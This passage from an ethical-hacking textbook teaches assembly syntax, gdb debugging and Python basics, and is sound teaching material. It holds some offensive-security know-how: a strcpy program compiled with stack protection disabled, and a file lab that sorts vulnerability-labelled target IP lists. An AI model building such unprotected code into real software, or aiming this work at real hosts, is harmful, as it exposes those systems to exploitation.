              (64-bit) architectures are still the most commonly used today, with other architectures
              such as ARM growing each year. Each architecture uses a unique instruction set. Instruc-
              tions from one processor architecture are not understood by another processor.

              Registers
              Registers are used to store data temporarily. Think of them as fast 8- to 64-bit chunks of
              memory for use internally by the processor. Registers can be divided into four categories
              (32-bit registers are prefixed with an E, and 64-bit registers are prefixed with an R, as in
              EAX and RAX). These are listed and described in Table 2-4.

                Register        64-bit Register          32-bit Register   16- and 8-bit
                Category        Name                     Name              Registers         Purpose
                General         RAX, RBX, RCX,           EAX, EBX,                           Used to manipulate data.
                registers       RDX, R8–R15.             ECX, EDX
                                                                           AX, BX, CX, DX    16-bit versions of the
                                                                                             preceding entry.
                                                                           AH, BH, CH, DH,   8-bit high- and low-order
                                                                           AL, BL, CL, DL    bytes of the previous entry.
                Segment                                                    CS, SS, DS,       16-bit. Used to hold the first
                registers                                                  ES, FS, GS        part of a memory address, as
                                                                                             well as pointers to code, stack,
                                                                                             and extra data segments.
                Offset                                                                       Used to indicate an offset
                registers                                                                    related to segment registers.
                                RBP (base pointer).      EBP                                 Points to the bottom of the
                                64-bit use of the base                                       stack frame, the beginning of
                                pointer depends                                              the local environment on the
                                on frame pointer                                             stack for a function.
                                omission, language
                                support, and usage
                                of registers R8–R15.
                                RSI (source index).      ESI                                 Used to hold the data source
                                                                                             offset in an operation using a
                                                                                             memory block.
                                RDI (destination         EDI                                 Used to hold the destination
                                index).                                                      data offset in an operation
                                                                                             using a memory block.
                                RSP (stack pointer).     ESP                                 Used to point to the top of
                                                                                             the stack.
                Special                                                                      Only used by the CPU.
                registers
Table 2-4 Categories of Registers for x86 and x86-64 Processors (continued)
                                                                                 Chapter 2: Programming Survival Skills
 Register    64-bit Register       32-bit Register   16- and 8-bit
 Category    Name                  Name              Registers       Purpose

                                                                                                                          PART I
             RFLAGS.               EFLAGS                            Used by the CPU to track
                                                                     results of logic and the state
                                                                     of the processor. Key flags
                                                                     to know are ZF=zero flag,
                                                                     IF=Interrupt enable flag, and
                                                                     SF=sign flag.
             RIP (instruction      32-bit: EIP                       Used to point to the address
             pointer).                                               of the next instruction to be
                                                                     executed.
Table 2-4 Categories of Registers for x86 and x86-64 Processors

Assembly Language Basics
Though entire books have been written about the ASM language, you can easily grasp a
few basics to become a more effective ethical hacker.

Machine vs. Assembly vs. C
Computers only understand machine language—that is, a pattern of 1s and 0s. Humans,
on the other hand, have trouble interpreting large strings of 1s and 0s, so assembly was
designed to assist programmers with mnemonics to remember the series of numbers. Later,
higher-level languages were designed, such as C and others, which remove humans even
further from the 1s and 0s. If you want to become a good ethical hacker, you must resist
societal trends and get back to basics with assembly.

AT&T vs. NASM
The two main forms of assembly syntax are AT&T and Intel. AT&T syntax is used by
the GNU Assembler (gas), contained in the gcc compiler suite, and is often used by
Linux developers. Of the Intel syntax assemblers, the Netwide Assembler (NASM) is
the most commonly used. The NASM format is used by many Windows assemblers and
debuggers. The two formats yield effectively the same machine language; however, there
are a few differences in style and format:

    • The source and destination operands are reversed, and different symbols are used
      to mark the beginning of a comment:
       • NASM format CMD <dest>, <source> <; comment>
       • AT&T format CMD <source>, <dest> <# comment>
    • AT&T format uses a % before registers; NASM does not. The % means
      “indirect operand.”
    • AT&T format uses a $ before literal values; NASM does not. The $ means
      “immediate operand.”
    • AT&T handles memory references differently than NASM.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 This section shows the syntax and examples in NASM format for each command.
              Additionally, it shows an example of the same command in AT&T format for compari-
              son. In general, the following format is used for all commands:
              <optional label:> <mnemonic>           <operands> <optional comments>

                 The number of operands (arguments) depends on the command (mnemonic).
              Although there are many assembly instructions, you only need to master a few. These are
              described in the following sections.

              mov
              The mov command copies data from the source to the destination. The value is not
              removed from the source location.

                NASM Syntax                       NASM Example              AT&T Example
                mov <dest>, <source>              mov eax, 51h ;comment     movl $51h, %eax #comment

              Data cannot be moved directly from memory to a segment register. Instead, you must use
              a general-purpose register as an intermediate step. Here’s an example:
              mov eax, 1234h ; store the value 1234 (hex) into EAX
              mov cs, ax    ; then copy the value of AX into CS.

              add and sub
              The add command adds the source to the destination and stores the result in the destina-
              tion. The sub command subtracts the source from the destination and stores the result
              in the destination.

                NASM Syntax                       NASM Example              AT&T Example
                add <dest>, <source>              add eax, 51h              addl $51h, %eax
                sub <dest>, <source>              sub eax, 51h              subl $51h, %eax

              push and pop
              The push and pop commands push and pop items from the stack, respectively.

                NASM Syntax                       NASM Example              AT&T Example
                push <value>                      push eax                  pushl %eax
                pop <dest>                        pop eax                   popl %eax

              xor
              The xor command conducts a bitwise logical “exclusive or” (XOR) function—for
              example, 11111111 XOR 11111111 = 00000000. Therefore, one option is to use XOR
              value, value to zero out or clear a register or memory location. Another commonly used
              bitwise operator is AND. We could perform a bitwise AND to determine whether a
              specific bit within a register or memory location is set or unset, or to determine if a call
              to a function such as malloc returns back the pointer to a chunk as opposed to a null.
                                                                            Chapter 2: Programming Survival Skills
This could be accomplished with assembly such as test eax, eax after a call to malloc.
If the call to malloc returns a null, then the test operation will set the “zero flag” in the

                                                                                                                     PART I
FLAGS register to a 1. The path followed during a conditional jump instruction such as
jnz after this test can be based on the result of the AND operation. The following is how
it would look in assembly:
call malloc(100)
test eax, eax
jnz loc_6362cc012

 NASM Syntax                    NASM Example                   AT&T Example
 xor <dest>, <source>           xor eax, eax                   xor %eax, %eax

jne, je, jz, jnz, and jmp
The jne, je, jz, jnz, and jmp commands branch the flow of the program to another
location based on the value of the eflag “zero flag.” jne/jnz jumps if the zero flag
equals 0; je/jz jumps if the zero flag equals 1; and jmp always jumps.

 NASM Syntax                    NASM Example                   AT&T Example
 jnz <dest> / jne <dest>        jne start                      jne start
 jz <dest> /je <dest>           jz loop                        jz loop
 jmp <dest>                     jmp end                        jmp end

call and ret
The call instruction redirects execution to another function. The virtual memory address
after the call instruction is first pushed onto the stack, serving as the return pointer, and
then redirection of execution to the called function is performed. The ret command is
used at the end of a procedure to return the flow to the command after the call.

 NASM Syntax                    NASM Example                   AT&T Example
 call <dest>                    call subroutine1               call subroutine1
 ret                            ret                            ret

inc and dec
The inc and dec commands increment and decrement the destination, respectively.

 NASM Syntax                    NASM Example                   AT&T Example
 inc <dest>                     inc eax                        incl %eax
 dec <dest>                     dec eax                        decl %eax

lea
The lea command loads the effective address of the source into the destination. This
can often be seen when passing the destination argument to a string-copying func-
tion, such as in the following AT&T syntax gdb disassembly example, where we are
Gray Hat Hacking: The Ethical Hacker’s Handbook
              writing the destination buffer address to the top of the stack as an argument to the
              gets function:
              lea -0x20(%ebp), %eax
              mov %eax, (%esp)
              call 0x8048608 <gets@plt>

                NASM Syntax                              NASM Example                       AT&T Example
                lea <dest>, <source>                     lea eax, [dsi +4]                  leal 4(%dsi), %eax

              System Calls: int, sysenter, and syscall
              System calls are a mechanism for a process to request a privileged operation to be per-
              formed where the context and execution of code are switched from user mode to kernel
              mode. The legacy x86 instruction to invoke a system call is int 0x80. This is considered
              deprecated but is still supported on 32-bit OSs. The sysenter instruction is its succes-
              sor for 32-bit applications. For 64-bit Linux-based OSs and applications, the syscall
              instruction is required. The various methods used to invoke a system call and set up the
              appropriate arguments must be well understood when you’re writing shellcode and other
              specialized programs or payloads.

              Addressing Modes
              In assembly, several methods can be used to accomplish the same thing. In particular,
              there are many ways to indicate the effective address to manipulate in memory. These
              options are called addressing modes and are summarized in Table 2-5. Remember, registers
              that start with “e” are 32 bits (4 bytes) and those with an “r” are 64 bits (8 bytes).

                Addressing Mode               Description                                              NASM Examples
                Register                      Registers hold the data to be manipulated. No            mov rbx, rdx
                                              memory interaction. Both registers must be the           add al, ch
                                              same size.
                Immediate                     The source operand is a numerical value. Decimal is      mov eax, 1234h
                                              assumed; use h for hex.                                  mov dx, 301
                Direct                        The first operand is the address of memory to            mov bh, 100
                                              manipulate. It’s marked with brackets.                   mov[4321h], bh
                Register Indirect             The first operand is a register in brackets that holds   mov [di], ecx
                                              the address to be manipulated.
                Based Relative                The effective address to be manipulated is               mov edx, 20[ebx]
                                              calculated by using ebx or ebp plus an offset value.
                Indexed Relative              Same as Based Relative, but edi and esi are used to      mov ecx,20[esi]
                                              hold the offset.
                Based Indexed                 The effective address is found by combining Based        mov ax, [bx][si]+1
                Relative                      Relative and Indexed Relative modes.
Table 2-5 Addressing Modes
                                                                          Chapter 2: Programming Survival Skills
Assembly File Structure

                                                                                                                   PART I
An assembly source file is broken into the following sections:

   • .model The .model directive indicates the size of the .data and .text sections.
   • .stack The .stack directive marks the beginning of the stack section and indicates
     the size of the stack in bytes.
   • .data The .data directive marks the beginning of the .data section and defines
     the variables, both initialized and uninitialized.
   • .text The .text directive holds the program’s commands.

Lab 2-8: Simple Assembly Program

The following 64-bit assembly program prints “Hello, haxor!” to the screen:
┌──(kali kali)-[~/GHHv6/ch02]
└─$ cat ./hello.asm
section .data                        ; section declaration
msg db "Hello, haxor!",0xa           ; our string with a carriage return
len equ    $ - msg                   ; length of our string, $ means here
section .text                        ; mandatory section declaration
                                     ; export the entry point to the ELF linker or
    global _start                    ; loaders conventionally recognize
                                     ; _start as their entry point
_start:

                                     ; now, write our string to stdout
                                     ; notice how arguments are loaded in reverse
    mov      edx,len                 ; third argument (message length)
    mov      ecx,msg                 ; second argument (ptr to message to write)
    mov      ebx,1                   ; load first argument (file handle (stdout))
    mov      eax,4                   ; system call number (4=sys_write)
    int      0x80                    ; call kernel interrupt and exit
    mov      ebx,0                   ; load first syscall argument (exit code)
    mov      eax,1                   ; system call number (1=sys_exit)
    int      0x80                    ; call kernel interrupt and exit

  The first step in assembling is to convert the assembly into object code (32-bit example):
┌──(kali kali)-[~/GHHv6/ch02]
└─$ nasm -felf64 hello.asm

  Next, you invoke the linker to make the executable:
┌──(kali kali)-[~/GHHv6/ch02]
└─$ ld -s -o hello hello.o

  Finally, you can run the executable:
┌──(kali kali)-[~/GHHv6/ch02]
└─$ ./hello
Hello, haxor!
Gray Hat Hacking: The Ethical Hacker’s Handbook
                Command                  Description
                b <function>             Sets a breakpoint at <function>
                b *mem                   Sets a breakpoint at the absolute memory location
                info b                   Displays information about breakpoints
                delete b                 Removes a breakpoint
                run <args>               Starts debugging the program from within gdb using the given arguments
                info reg                  Displays information about the current register state
                stepi or si              Executes one machine instruction
                next or n                Executes one function
                bt                       Backtrace command; shows the names of stack frames
                up/down                  Moves up and down the stack frames
                print var                Prints the value of the variable and prints the value of a register, respectively
                print /x $<reg>
                x /NT A                  Examines memory, where N = number of units to display; T = type of data to
                                         display (x:hex, d:dec, c:char, s:string, i:instruction); and A = absolute address
                                         or symbolic name, such as “main”
                quit                     Exits gdb
Table 2-6 Common gdb Commands

              Debugging with gdb
              The debugger of choice for programming with C on Unix systems is gdb. It provides a
              robust command-line interface, allowing you to run a program while maintaining full
              control. For example, you can set breakpoints in the execution of the program and moni-
              tor the contents of memory or registers at any point you like. For this reason, debuggers
              like gdb are invaluable to programmers and hackers alike. For those looking for a more
              graphical debugging experience on Linux, alternatives or extensions such as ddd and edb
              are available.

              gdb Basics
              Commonly used commands in gdb are listed and described in Table 2-6.

              Lab 2-9: Debugging

              To debug our sample program, first install gdb into your Kali instance:
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ sudo apt-get update
              Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
              …truncated for brevity…
                                                                  Chapter 2: Programming Survival Skills
Reading package lists... Done
┌──(kali kali)-[~/GHHv6/ch02]
└─$ sudo apt install gdb

                                                                                                           PART I
Reading package lists... Done
…truncated for brevity…
Do you want to continue? [Y/n] y
Get:1 http://kali.download/kali kali-rolling/main amd64 libc6-i386 amd64
2.31-9 [2,819 kB]
…truncated for brevity…

   Now, we issue the following commands. The first command will recompile our meet
program with debugging symbols and other useful options (refer to Table 2-3).
┌──(kali kali)-[~/GHHv6/ch02]
└─$ gcc -ggdb -mpreferred-stack-boundary=4 -fno-stack-protector -o meet meet.c
┌──(kali kali)-[~/GHHv6/ch02]
└─$ gdb -q meet
Reading symbols from meet...
(gdb) run l337 Haxor
Starting program: /home/kali/GHHv6/ch02/meet l337 Haxor
Hello l337 Haxor
Bye l337 Haxor
[Inferior 1 (process 17417) exited normally]
(gdb) b main
Breakpoint 1 at 0x5555555551ab: file meet.c, line 10.
(gdb) run l337 Haxor
Starting program: /home/kali/GHHv6/ch02/meet l337 Haxor

Breakpoint 1, main (argc=3, argv=0x7fffffffe488) at meet.c:10
10       greeting(argv[1], argv[2]);         // call function, pass title & name
(gdb) n
Hello l337 Haxor
11       printf("Bye %s %s\n", argv[1], argv[2]); // say "bye"
(gdb) n
Bye l337 Haxor
12    }                                       // exit program
(gdb) p argv[1]
$1 = 0x7fffffffe719 "l337"
(gdb) p argv[2]
$2 = 0x7fffffffe71c "Haxor"
(gdb) p argc
$3 = 3
(gdb) info b
Num     Type            Disp Enb Address              What
1       breakpoint      keep y   0x00005555555551ab in main at meet.c:10
        breakpoint already hit 1 time
(gdb) info reg
rax             0x0                  0
rbx             0x0                  0
rcx             0x0                  0
rdx             0x0                  0
rsi             0x5555555592a0       93824992252576
…truncated for brevity…
(gdb) quit
A debugging session is active.
Do you still want to close the debugger?(y or n) y
$
Gray Hat Hacking: The Ethical Hacker’s Handbook

              Lab 2-10: Disassembly with gdb

              To conduct disassembly with gdb, you need the following two commands:
              set disassembly-flavor <intel/att>
              disassemble <function name>

                 The first command toggles back and forth between Intel (NASM) and AT&T format.
              By default, gdb uses AT&T format. The second command disassembles the given func-
              tion (to include main, if given). For example, to disassemble the function called greeting
              in both formats, you type this:
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ gdb -q meet
              Reading symbols from meet...
              (gdb) disassemble greeting
              Dump of assembler code for function greeting:
                 0x0000000000001145 <+0>:     push   %rbp
                 0x0000000000001146 <+1>:     mov    %rsp,%rbp
                 0x0000000000001149 <+4>:     sub    $0x1a0,%rsp
                 0x0000000000001150 <+11>:    mov    %rdi,-0x198(%rbp)
                 0x0000000000001157 <+18>:    mov    %rsi,-0x1a0(%rbp)
                 0x000000000000115e <+25>:    mov    -0x1a0(%rbp),%rdx
                 0x0000000000001165 <+32>:    lea    -0x190(%rbp),%rax
                 0x000000000000116c <+39>:    mov    %rdx,%rsi
                 0x000000000000116f <+42>:    mov    %rax,%rdi
                 0x0000000000001172 <+45>:    call   0x1030 <strcpy@plt>
                 0x0000000000001177 <+50>:    lea    -0x190(%rbp),%rdx
                 0x000000000000117e <+57>:    mov    -0x198(%rbp),%rax
                 0x0000000000001185 <+64>:    mov    %rax,%rsi
                 0x0000000000001188 <+67>:    lea    0xe75(%rip),%rdi        # 0x2004
                 0x000000000000118f <+74>:    mov    $0x0,%eax
                 0x0000000000001194 <+79>:    call   0x1040 <printf@plt>
                 0x0000000000001199 <+84>:    nop
                 0x000000000000119a <+85>:    leave
                 0x000000000000119b <+86>:    ret
              End of assembler dump.
              (gdb) set disassembly-flavor intel
              (gdb) disassemble greeting
              Dump of assembler code for function greeting:
                 0x0000000000001145 <+0>:     push   rbp
                 0x0000000000001146 <+1>:     mov    rbp,rsp
                 0x0000000000001149 <+4>:     sub    rsp,0x1a0
                 0x0000000000001150 <+11>:    mov    QWORD PTR [rbp-0x198],rdi
                 0x0000000000001157 <+18>:    mov    QWORD PTR [rbp-0x1a0],rsi
                 0x000000000000115e <+25>:    mov    rdx,QWORD PTR [rbp-0x1a0]
                 0x0000000000001165 <+32>:    lea    rax,[rbp-0x190]
                 0x000000000000116c <+39>:    mov    rsi,rdx
                 0x000000000000116f <+42>:    mov    rdi,rax
                 0x0000000000001172 <+45>:    call   0x1030 <strcpy@plt>
              …truncated for brevity…
                 0x000000000000119b <+86>:    ret
              End of assembler dump.
              (gdb) quit

                  Here are a couple more commonly used commands:
              info functions
              disassemble /r <function name>
                                                                           Chapter 2: Programming Survival Skills
   The info functions command shows all dynamically linked functions, as well as all
internal functions, unless the program has been stripped. Using the disassemble func-

                                                                                                                    PART I
tion with the /r <function name> option dumps out the opcodes and operands as well
as the instructions. Opcodes are essentially the machine code representations of the preas-
sembled assembly code.

Python Survival Skills
Python is a popular interpreted, object-oriented programming language. Hacking tools
(and many other applications) use Python because it is a breeze to learn and use, is quite
powerful, and has a clear syntax that makes it easy to read. This introduction covers only
the bare minimum you need to understand. You’ll almost surely want to know more,
and for that you can check out one of the many good books dedicated to Python or
the extensive documentation at www.python.org. Python 2.7 was retired on January 1,
2020. Many practitioners are still fond of 2.7 and would tell you over the years that if you
want to learn Python to be able to use and modify or extend existing Python projects,
you should first learn Python 2.7. However, at this time, if your goal is to get working
on new Python development, you should focus on Python 3, as it cleans up a lot of the
issues in Python 2.7. There are still countless programs with dependencies on Python 2.6
or Python 2.7, so be aware of what version you are using.

Getting Python
We’re going to blow past the usual architecture diagrams and design goals spiel and
tell you to just go download the Python version for your OS from www.python.org/
download/ so you can follow along here. Alternatively, try just launching it by typing
python at your command prompt—it comes installed by default on many Linux distri-
butions and Mac OS X 10.3 and later.

  Python for macOS and Kali Users
  For macOS users, Apple does not include Python’s IDLE user interface, which is
  handy for Python development. You can grab it from www.python.org/download/
  mac/, or you can choose to edit and launch Python from Xcode, Apple’s develop-
  ment environment, by following the instructions at http://pythonmac.org/wiki/
  XcodeIntegration. If you already have Python but need to upgrade to Python 3 and
  set that as the default, the correct way, using pyenv, then see the “For Further Read-
  ing” section for a link to a good tutorial.
     For Kali users, as of the writing of this chapter, Kali 2020.4 is the latest version,
  and in that version, python2 is still the default linked version, for backward compat-
  ibility, until all the scripts are updated to python3. See the “For Further Reading”
  section for a link to change this.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Because Python is interpreted (not compiled), you can get immediate feedback from
              Python using its interactive prompt. We’ll use it for the next few pages, so you should
              start the interactive prompt now by typing python.

              Lab 2-11: Launching Python

              If you have Kali 2020.4, you will still need to manually launch version 3 by running the
              command python3, like so:
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ python3
              Python 3.8.6 (default, Sep 25 2020, 09:36:53)
              [GCC 10.2.0] on linux
              Type "help", "copyright", "credits" or "license" for more information.
              >>>

              Lab 2-12: “Hello, World!” in Python

              Every language introduction must start with the obligatory “Hello, world!” example, and
              here it is for Python 3.8.6 on Kali 2020.4, launched with the previous python3 command:
              >>> print("Hello, world!")
              Hello, world!
              >>>

                 Notice that in Python 3, print is a formal function and requires parentheses2. If you
              wish to exit this Python shell, type exit().

              Python Objects
              The main things you need to understand really well are the different types of objects that
              Python can use to hold data and how it manipulates that data. We’ll cover the big five
              data types: strings, numbers, lists, dictionaries, and files. After that, we’ll cover some basic
              syntax and the bare minimum you will need to know about Python and networking.

              Lab 2-13: Strings

              You already used one string object in Lab 2-12. Strings are used in Python to hold text.
              The best way to show you how easy it is to use and manipulate strings is to demonstrate
              the technique, again using the Python 3 shell, as follows:
              >>> string1 = 'Dilbert'
              >>> string2 = 'Dogbert'
              >>> string1 + string2
              'DilbertDogbert'
                                                                      Chapter 2: Programming Survival Skills
>>> string1 + " Asok " + string2
'Dilbert Asok Dogbert'
>>> string3 = string1 + string2 + "Wally"

                                                                                                               PART I
>>> string3
'DilbertDogbertWally'
>>> string3[2:10] # string 3 from index 2 (0-based) to 10
'lbertDog'
>>> string3[0]
'D'
>>> len(string3)
19
>>> string3[14:]    # string3 from index 14 (0-based) to end
'Wally'
>>> string3[-5:]    # Start 5 from the end and print the rest
'Wally'
>>> string3.find('Wally')    # index (0-based) where string starts
14
>>> string3.find('Alice')    # -1 if not found
-1
>>> string3.replace('Dogbert','Alice') # Replace Dogbert with Alice
'DilbertAliceWally'
>>> print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') # 30 A's the hard way
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>>> print ('A' * 30)    # 30 A's the easy way
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

   These are the basic string-manipulation functions you’ll use when working with
simple strings. The syntax is simple and straightforward, just as you’ll come to expect
from Python. One important distinction to make right away is that each of those
strings (we named them string1, string2, and string3) is simply a pointer—for those
familiar with C—or a label for a blob of data out in memory someplace. One concept
that sometimes trips up new programmers is the idea of one label (or pointer) pointing
to another label. The following code and Figure 2-1 demonstrate this concept:
>>> label1 = 'Dilbert'
>>> label2 = label1

   At this point, we have a blob of memory somewhere with the Python string 'Dilbert'
stored. We also have two labels pointing at that blob of memory. If we then change
label1’s assignment, label2 does not change:
... continued from above
>>> label1 = 'Dogbert'
>>> label2
'Dilbert'

Figure 2-1
Two labels
pointing at the
same string in
memory
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Figure 2-2
              Label1 is
              reassigned
              to point to a
              different string.

                 As you can see in Figure 2-2, label2 is not pointing to label1, per se. Rather, it’s point-
              ing to the same thing label1 was pointing to until label1 was reassigned.

              Lab 2-14: Numbers

              Similar to Python strings, numbers point to an object that can contain any kind of
              number. This data type can hold small numbers, big numbers, complex numbers,
              negative numbers, and any other kind of number you can dream up. The syntax is just
              as you’d expect:
              >>> n1=5    # Create a Number object with value 5 and label it n1
              >>> n2=3
              >>> n1 * n2
              15
              >>> n1 ** n2      # n1 to the power of n2 (5^3)
              125
              >>> 5 / 3, 5 % 3     # Divide 5 by 3, then 5 modulus 3
              (1.6666666666666667, 2)
              # In Python 2.7, the above 5 / 3 calculation would not result in a float without
              # specifying at least one value as a float.
              >>> n3 = 1        # n3 = 0001 (binary)
              >>> n3 << 3       # Shift left three times: 1000 binary = 8
              8
              >>> 5 + 3 * 2     # The order of operations is correct
              11

                Now that you’ve seen how numbers work, we can start combining objects. What
              happens when we evaluate a string plus a number?
              >>> s1 = 'abc'
              >>> n1 = 12
              >>> s1 + n1
              Traceback (most recent call last):
                File "<stdin>", line 1, in <module>
              TypeError: Can't convert 'int' object to str implicitly

                Error! We need to help Python understand what we want to happen. In this case, the
              only way to combine 'abc' and 12 is to turn 12 into a string. We can do that on the fly:
              >>> s1 + str(n1)
              'abc12'
              >>> s1.replace('c',str(n1))
              'ab12'
                                                                          Chapter 2: Programming Survival Skills
  When it makes sense, different types can be used together:

                                                                                                                   PART I
>>> s1*n1   # Display 'abc' 12 times
'abcabcabcabcabcabcabcabcabcabcabcabc'

  And one more note about objects—simply operating on an object often does not
change the object. The object itself (number, string, or otherwise) is usually changed only
when you explicitly set the object’s label (or pointer) to the new value, as follows:
>>> n1 = 5
>>> n1 ** 2                 # Display value of 5^2
25
>>> n1                      # n1, however is still set to 5
5
>>> n1 = n1 ** 2            # Set n1 = 5^2
>>> n1                      # Now n1 is set to 25
25

Lab 2-15: Lists

The next type of built-in object we’ll cover is the list. You can throw any kind of object
into a list. A list is usually created by adding [ and ] around an object or a group of
objects. You can do the same kind of clever “slicing” as with strings. Slicing refers to our
string example of returning only a subset of the object’s values—for example, from the
fifth value to the tenth with label1[5:10]. Let’s look at how the list type works:
>>> mylist = [1,2,3]
>>> len(mylist)
3
>>> mylist*4            # Display mylist, mylist, mylist, mylist
[1, 2, 3, 1, 2, 3, 1, 2, 3, 1, 2, 3]
>>> 1 in mylist         # Check for existence of an object
True
>>> 4 in mylist
False
>>> mylist[1:]          # Return slice of list from index 1 and on
[2, 3]
>>> biglist = [['Dilbert', 'Dogbert', 'Catbert'],
... ['Wally', 'Alice', 'Asok']]     # Set up a two-dimensional list
>>> biglist[1][0]
'Wally'
>>> biglist[0][2]
'Catbert'
>>> biglist[1] = 'Ratbert'    # Replace the second row with 'Ratbert'
>>> biglist
[['Dilbert', 'Dogbert', 'Catbert'], 'Ratbert']
>>> stacklist = biglist[0]    # Set another list = to the first row
>>> stacklist
['Dilbert', 'Dogbert', 'Catbert']
>>> stacklist = stacklist + ['The Boss']
>>> stacklist
Gray Hat Hacking: The Ethical Hacker’s Handbook
              ['Dilbert', 'Dogbert', 'Catbert', 'The Boss']
              >>> stacklist.pop()           # Return and remove the last element
              'The Boss'
              >>> stacklist.pop()
              'Catbert'
              >>> stacklist.pop()
              'Dogbert'
              >>> stacklist
              ['Dilbert']
              >>> stacklist.extend(['Alice', 'Carol', 'Tina'])
              >>> stacklist
              ['Dilbert', 'Alice', 'Carol', 'Tina']
              >>> stacklist.reverse()
              >>> stacklist
              ['Tina', 'Carol', 'Alice', 'Dilbert']
              >>> del stacklist[1]          # Remove the element at index 1
              >>> stacklist
              ['Tina', 'Alice', 'Dilbert']

                 Next, we’ll take a quick look at dictionaries and then files, and then we’ll put all the
              elements together.

              Lab 2-16: Dictionaries

              Dictionaries are similar to lists, except that an object stored in a dictionary is referenced
              by a key, not by the index of the object. This turns out to be a very convenient mecha-
              nism for storing and retrieving data. A dictionary is created by adding { and } around a
              key-value pair, like this:
              >>> d = { 'hero' : 'Dilbert' }
              >>> d['hero']
              'Dilbert'
              >>> 'hero' in d
              True
              >>> 'Dilbert' in d      # Dictionaries are indexed by key, not value
              False
              >>> d.keys()      # keys() returns a list of all objects used as keys
              dict_keys(['hero'])
              >>> d.values()    # values() returns a list of all objects used as values
              dict_keys(['Dilbert'])
              >>> d['hero'] = 'Dogbert'
              >>> d
              {'hero': 'Dogbert'}
              >>> d['buddy'] = 'Wally'
              >>> d['pets'] = 2       # You can store any type of object, not just strings
              >>> d
              {'hero': 'Dogbert', 'buddy': 'Wally', 'pets': 2}

                 We’ll use dictionaries more in the next section as well. Dictionaries are a great way to
              store any values that you can associate with a key, where the key is a more useful way to
              fetch the value than a list’s index.
                                                                          Chapter 2: Programming Survival Skills

Lab 2-17: Files with Python

                                                                                                                   PART I
File access is as easy as the rest of Python’s language. Files can be opened (for reading
or for writing), written to, read from, and closed. Let’s put together an example using
several of the different data types discussed here, including files. This example assumes
that we start with a file named targets and that we transfer the file contents into indi-
vidual vulnerability target files. (We can hear you saying, “Finally, an end to the Dilbert
examples!”) Note the required indentation being used within blocks. In this example, we
use the Python 3 shell to parse a file and move the contents of that file into two other
files. We use two shells in Kali, each in the same directory. Comments, which start with
the # symbol, are given within the code. You obviously don’t need to type them.
┌──(kali kali)-[~/GHHv6/ch02]
└─$ cat targets
RPC-DCOM         10.10.20.1,10.10.20.4
SQL-SA-blank-pw 10.10.20.27,10.10.20.28
# We want to move the contents of targets into two separate files
┌──(kali kali)-[~/GHHv6/ch02]
└─$ python3
# First, open the file for reading
>>> targets_file = open('targets','r') ➊
# Read the contents into a list of strings
>>> lines = targets_file.readlines()
>>> lines
['RPC-DCOM\t10.10.20.1,10.10.20.4\n', 'SQL-SA-blank-pw\
t10.10.20.27,10.10.20.28\n']
# We can also do it with a "with" statement using the following syntax:
>>> with open("targets", "r") as f:
...      lines = f.readlines()
...
>>> lines
['RPC-DCOM         10.10.20.1,10.10.20.4\n', 'SQL-SA-blank-pw
10.10.20.27,10.10.20.28\n', '\n']
# The "with" statement automatically ensures that the file is closed and
# is seen as a more appropriate way of working with files..
# Let's organize this into a dictionary
>>> lines_dictionary = {}
>>> for line in lines: ➋         # Notice the trailing : to start a loop
...      one_line = line.split()      # split() will separate on white space
...      line_key = one_line[0]
...      line_value = one_line[1]
...      lines_dictionary[line_key] = line_value
...      # Note: Next line is blank (<CR> only) to break out of the for loop
...
>>> # Now we are back at python prompt with a populated dictionary
>>> lines_dictionary
{'RPC-DCOM': '10.10.20.1,10.10.20.4', 'SQL-SA-blank-pw':
'10.10.20.27,10.10.20.28'}
# Loop next over the keys and open a new file for each key
>>> for key in lines_dictionary.keys():
...      targets_string = lines_dictionary[key]        # value for key
...      targets_list = targets_string.split(',')      # break into list
...      targets_number = len(targets_list)
Gray Hat Hacking: The Ethical Hacker’s Handbook
              ...     filename = key + '_' + str(targets_number) + '_targets'
              ...     vuln_file = open(filename,'w')
              ...     for vuln_target in targets_list:       # for each IP in list...
              ...             vuln_file.write(vuln_target + '\n')
              ...     vuln_file.close()
              ...
              >>> exit()
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ ls
              RPC-DCOM_2_targets              targets
              SQL-SA-blank-pw_2_targets
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ cat SQL-SA-blank-pw_2_targets
              10.10.20.27
              10.10.20.28
              ┌──(kali kali)-[~/GHHv6/ch02]
              └─$ cat RPC-DCOM_2_targets
              10.10.20.1
              10.10.20.4

                 This example introduces a couple new concepts. First, you now see how easy it is to
              use files; open() takes two arguments ➊: the first is the name of the file you’d like to read
              or create, and the second is the access type. You can open the file for reading (r), writing
              (w), and appending (a). Adding a + after the letter adds more permissions; for example,
              r+ results in read and write access to the file. Adding a b after the permission opens it in
              binary mode.
                 Second, you now have a for loop example ➋. The structure of a for loop is as follows:
              for <iterator-value> in <list-to-iterate-over>:
                   # Notice the colon at the end of the previous line
                   # Notice the indentation
                   # Do stuff for each value in the list

                                 CAUTION In Python, white space matters, and indentation is used to mark
                                 code blocks. Most Python programmers stick with an indentation of four
                                 spaces. The indentation must be consistent throughout a block. See the link
                                 to the Python style guide in the “For Further Reading” section.

                 Unindenting one level or a placing a carriage return on a blank line closes the loop.
              No need for C-style curly brackets. Also, if statements and while loops are similarly
              structured. Here is an example:
              if foo > 3:
                    print('Foo greater than 3')
              elif foo == 3:
                    print('Foo equals 3')
              else:
                    print('Foo not greater than or equal to 3')
              ...
              while foo < 10:
                    foo = foo + bar
                                                                          Chapter 2: Programming Survival Skills

Lab 2-18: Sockets with Python

                                                                                                                   PART I
The final topic we need to cover is Python’s socket object. To demonstrate Python
sockets, let’s build a simple client that connects to a remote (or local) host and then
sends 'Say something:'. To test this code, we need a “server” to listen for this client to
connect. We can simulate a server by binding a netcat listener to port 4242 with the
following syntax (you need to launch nc in a new shell):
┌──(kali kali)-[~/GHHv6/ch02]
└─$ nc -l -p 4242

  The client code (which should be run in a separate shell) follows:
#client.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 4242))➊
